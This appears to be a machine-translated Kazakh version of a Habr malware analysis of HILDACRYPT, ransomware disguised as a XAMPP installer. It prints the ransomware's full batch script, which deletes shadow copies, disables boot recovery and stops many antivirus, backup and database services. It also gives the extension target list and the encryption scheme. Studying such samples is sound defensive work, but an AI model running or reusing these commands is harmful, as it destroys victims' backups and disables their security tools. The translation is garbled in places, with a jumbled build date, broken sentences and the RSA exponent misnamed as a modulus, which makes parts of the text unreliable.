Сәлем, Хабр! Тағы да біз Ransomware санатындағы зиянды бағдарламалардың соңғы нұсқалары туралы айтып отырмыз. HILDACRYPT – бұл бағдарламалық жасақтаманы тарату үшін пайдаланылған Netflix мультфильмінің атымен аталған 2019 жылдың тамызында табылған Hilda отбасының мүшесі болып табылатын жаңа төлемдік бағдарлама. Бүгін біз осы жаңартылған ransomware вирусының техникалық мүмкіндіктерімен танысамыз.
Hilda ransomware бағдарламасының бірінші нұсқасында Youtube сайтында жарияланған сілтеме мультфильмдер сериясы төлем хатында қамтылған. HILDACRYPT заңды XAMPP орнатушысы, MariaDB, PHP және Perl кіретін оңай орнатылатын Apache дистрибутиві ретінде көрінеді. Сонымен қатар, криптолокатордың басқа файл атауы бар - xamp. Сонымен қатар, ransomware файлында электрондық қолтаңба жоқ.
Статикалық талдау
Төлем бағдарламасы MS Windows жүйесіне арналған PE32 .NET файлында бар. Оның көлемі 135 168 байт. Негізгі бағдарлама коды да, қорғаушы бағдарлама коды да C# тілінде жазылған. Құрастыру күні мен уақыт белгісіне сәйкес екілік жүйе 14 жылдың 2019 қыркүйегінде жасалған.
Detect It Easy сәйкес, төлемдік бағдарлама Confuser және ConfuserEx көмегімен мұрағатталған, бірақ бұл обфускаторлар бұрынғыдай, тек ConfuserEx ғана Confuser мұрагері, сондықтан олардың кодтық қолтаңбалары ұқсас.
HILDACRYPT шын мәнінде ConfuserEx пакетімен жинақталған.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Шабуыл векторы
Сірә, төлем бағдарламасы заңды XAMPP бағдарламасы ретінде көрінетін веб-бағдарламалау сайттарының бірінде табылған.
Инфекцияның барлық тізбегін көруге болады .
Мазасыздық
Ransomware жолдары шифрланған түрде сақталады. Іске қосылған кезде HILDACRYPT оларды Base64 және AES-256-CBC арқылы шифрын шешеді.
параметр
Ең алдымен, төлем бағдарламасы %AppDataRoaming% қалтасында GUID (Globly Unique Identifier) параметрі кездейсоқ құрылған қалтаны жасайды. Осы орынға bat файлын қосу арқылы төлемдік бағдарламалық құрал оны cmd.exe арқылы іске қосады:
cmd.exe /c JKfgkgj3hjgfhjka.bat және шығу
Содан кейін ол жүйе мүмкіндіктерін немесе қызметтерін өшіру үшін пакеттік сценарийді орындауды бастайды.
Сценарий көлеңкелі көшірмелерді бұзатын, SQL серверін, сақтық көшірме жасауды және антивирустық шешімдерді өшіретін командалардың ұзын тізімін қамтиды.
Мысалы, ол Acronis Backup қызметтерін тоқтату әрекеті сәтсіз аяқталды. Бұған қоса, ол келесі жеткізушілердің сақтық көшірме жүйелеріне және антивирустық шешімдеріне шабуыл жасайды: Veeam, Sophos, Kaspersky, McAfee және т.б.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Жоғарыда аталған қызметтер мен процестер өшірілгеннен кейін, криптлокатор барлық қажетті қызметтер жұмыс істемей тұрғанына көз жеткізу үшін тапсырмалар тізімі пәрменін пайдаланып, барлық іске қосылған процестер туралы ақпаратты жинайды.
тапсырмалар тізімі v/fo csv
Бұл пәрмен элементтері «,» белгісімен бөлінген орындалатын процестердің толық тізімін көрсетеді.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Осы тексеруден кейін төлем бағдарламасы шифрлау процесін бастайды.
Шифрлау
Файлды шифрлау
HILDACRYPT Recycle.Bin және Reference AssembliesMicrosoft қалталарынан басқа қатты дискілердің барлық табылған мазмұнын аралайды. Соңғысы .Net қолданбалары үшін өте маңызды dll, pdb және т.б. файлдарды қамтиды, олар төлем бағдарламасының жұмысына әсер етуі мүмкін. Шифрланатын файлдарды іздеу үшін келесі кеңейтім тізімі пайдаланылады:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Төлем бағдарламасы пайдаланушы файлдарын шифрлау үшін AES-256-CBC алгоритмін пайдаланады. Кілт өлшемі 256 бит және инициализация векторының (IV) өлшемі 16 байт.
Келесі скриншотта byte_2 және byte_1 мәндері GetBytes() көмегімен кездейсоқ түрде алынды.
Кілт
ВИ
Шифрланған файлда HCY кеңейтімі бар!.. Бұл шифрланған файлдың мысалы. Жоғарыда аталған кілт және IV осы файл үшін жасалған.
Кілтті шифрлау
Криптлокатор жасалған AES кілтін шифрланған файлда сақтайды. Шифрланған файлдың бірінші бөлігінде XML пішіміндегі HILDACRYPT, KEY, IV, FileLen сияқты деректерді қамтитын тақырып бар және келесідей көрінеді:
AES және IV кілттерді шифрлау RSA-2048 көмегімен, ал кодтау Base64 көмегімен жүзеге асырылады. RSA ашық кілті XML пішіміндегі шифрланған жолдардың бірінде криптолокатордың денесінде сақталады.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA ашық кілті AES файл кілтін шифрлау үшін пайдаланылады. RSA ашық кілті Base64 кодталған және 65537 модулі мен жалпы көрсеткішінен тұрады. Шифрды шешу үшін шабуылдаушыда бар RSA жеке кілті қажет.
RSA шифрлауынан кейін AES кілті шифрланған файлда сақталған Base64 көмегімен кодталады.
Төлем хабары
Шифрлау аяқталғаннан кейін HILDACRYPT html файлын файлдарды шифрлаған қалтаға жазады. Төлем туралы хабарландыруда жәбірленуші шабуылдаушымен байланыса алатын екі электрондық пошта мекенжайы бар.
Бопсалау туралы хабарламада «No loli қауіпсіз;)» деген жол бар - Жапонияда тыйым салынған кішкентай қыздардың пайда болуымен аниме және манга кейіпкерлеріне сілтеме.
қорытынды
HILDACRYPT, жаңа төлемдік бағдарламалық қамтамасыз ету тобы, жаңа нұсқасын шығарды. Шифрлау үлгісі жәбірленушінің төлемдік бағдарламамен шифрланған файлдарды ашуына жол бермейді. Cryptolocker сақтық көшірме жүйелеріне және антивирустық шешімдерге қатысты қорғау қызметтерін өшіру үшін белсенді қорғау әдістерін пайдаланады. HILDACRYPT авторы - Netflix-те көрсетілген Хилда анимациялық сериясының жанкүйері, трейлерге сілтеме бағдарламаның алдыңғы нұсқасын сатып алу хатында бар.
Әдеттегідей, и компьютеріңізді HILDACRYPT төлем бағдарламалық құралынан қорғай алады, ал провайдерлер өз тұтынушыларын қорғау мүмкіндігіне ие. . Қорғау осы шешімдердің болуымен қамтамасыз етіледі сақтық көшірме жасауды ғана емес, сонымен қатар біздің біріктірілген қауіпсіздік жүйемізді де қамтиды - Машиналық оқыту үлгісімен жұмыс істейді және мінез-құлық эвристикасына негізделген, бұл технология нөлдік күндік төлем бағдарламасының қаупіне қарсы тұруға қабілетті.
Келісім көрсеткіштері
Файл кеңейтімі HCY!
HILDACRYPTReadMe.html
xamp.exe бір әрпі «p» және цифрлық қолтаңбасы жоқ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Ақпарат көзі: www.habr.com